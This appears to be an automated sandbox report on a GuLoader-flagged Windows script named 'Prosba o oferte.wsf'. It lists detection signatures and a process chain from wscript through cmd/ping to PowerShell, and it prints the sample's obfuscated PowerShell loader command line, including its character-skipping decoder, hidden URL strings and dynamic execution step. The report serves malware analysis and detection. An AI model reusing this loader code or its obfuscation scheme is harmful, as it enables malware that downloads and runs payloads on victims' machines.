Edit tour
Windows
Analysis Report
Prosba o oferte.wsf
Overview
General Information
Detection
GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Scan Loop Network
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 7312 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Prosb a o oferte .wsf" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 7340 cmdline:
cmd.exe /c ping 6777 .6777.6777 .677e MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7348 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - PING.EXE (PID: 7392 cmdline:
ping 6777. 6777.6777. 677e MD5: 2F46799D79D22AC72C241EC0322B011D) - powershell.exe (PID: 7468 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "<#nettene s Semipopu lar overst ates Photo drome #>;$ Lighedside ologis='Om rrer';<#Ar bejdsbevge lser Allod ialist Ama nist Lydki lden Bortv ejrede Per istole #>; $Occipitob regmatic=$ Recrate149 +$host.'Pr ivateData' ;If ($Occi pitobregma tic) {$Ryk kendes++;} function R idsning89( $Kabine){$ Tardy=$Geh ejmeraaden +$Kabine.L ength-$Ryk kendes; fo r( $Antilo garithmic= 7;$Antilog arithmic - lt $Tardy; $Antilogar ithmic+=8) {$Achim='F ilterbredd ers';$Moli tion+=$Kab ine[$Antil ogarithmic ];$Facette r='Krigser klringer'; }$Molition ;}function Ruttendes 80($Drifts regnskabet ){ & ($Ansgning sfristen15 1) ($Drift sregnskabe t);}$Nondi ffusible=R idsning89 'M.urernM Hem,meoAlf aderzHexin ,niTingsvi l Platonls k ddera V nero/Dubla n 5 Dumpek .Fisende0 Van.it Ost race( Penc lW Sever, i Sym olnS koles.dNon ubiqoMissi lswH,dderr sListles S emi acNliv egenT ,ist ol Mngder 1Habitus0s trandf.Pro noun0 Unlo qu;Wh tero RundsaWOp prioriErod erinNjesb, g6Maatter4 Gerning;Re krter Vill aexGydning 6Rensni,4B arrica;Und isc Foggi r luorev Noelge: Yt ri.g1Humor s 2Underho 1Chrysa .K nivsme0Tri ker,) kade mi postedG Selvbyge j ergarcIndt agekSh ndy ioUn easi/ Per ore2ai rchec0Konf orm1Subtra k0Afvegne0 Coloniz1 I s,ide0Movi epk1 Bovru p SkrudsaF UngoadeiDy slysirKons trueF reko mfSteto ko Hydr baxOr kidxj/ So, ial1Turbom o2Banc,dr1 Doozie. E ilog0Poly aem ';$ene re=Ridsnin g89 'Bonin geUSmmomet s Forthce ReinfurCir c mv-.onin teaGlairie gTitt pye Duss sNLin uxwit emul e ';$over saettelser =Ridsning8 9 ' Temp l hTilendetF agretltjul eferpSuiss ef: andomr / nthrac/ AvidlysBal dakiiPodar gilFiletfa i FlaxwonF erskvaalyc op rsIndes .rt akettr .OdisblarK atedero An fgte/Caust icKSuboper oOverfrimE lf nbemUnd .rstu unma knToneskii Dementek L oc,moutran smut Afgoe reTillg br R turnenPr egalve Fag idisDisart i.Rettetai DebetsnBa rneskf Hj, rpe ';$Rus trdes=Rids ning89 'Sn rkled>Kol nna ';$Ans gningsfris ten151=Rid sning89 'A dmittaIGte sengEB tal inXShownce ';$Lifefu lly169='fo rvrredes'; $Fagbog='\ Selvsikker hedens.Pan ';Ruttende s80 (Ridsn ing89 'Ryg skca$Konom iigBughind LSpoonfuoA f ekslbInd uk,iATehtt erL Un ors :Uskad la Kont ar Mo ra deTjen. reN Compri IPo eredG Una so=Str appa$Sttte krELampetc NTrenchaV Af.ejs:Udr ingeaImmun ogpRullers PGa enesdS traffoAOp egniTFurac ioACloques +Tredve.$R ec iliFOve rskgaBogac h gSwaverp BSexsymbOO rgueslGNaz drow ');Ru ttendes80 (Ridsning8 9 'Satinsk $Po encegC ol,barlSec retiO Ultr asbRampage AFumlendL Ompo t:Sol ariur Vel, ilePaaklis MSidstemiF orblfnsHet eroteQuadr uprStandar NbroderiEX iphipl=Unp atri$Cuttl efoZ.braer v ppositE N gaciRbnk bids Dwe.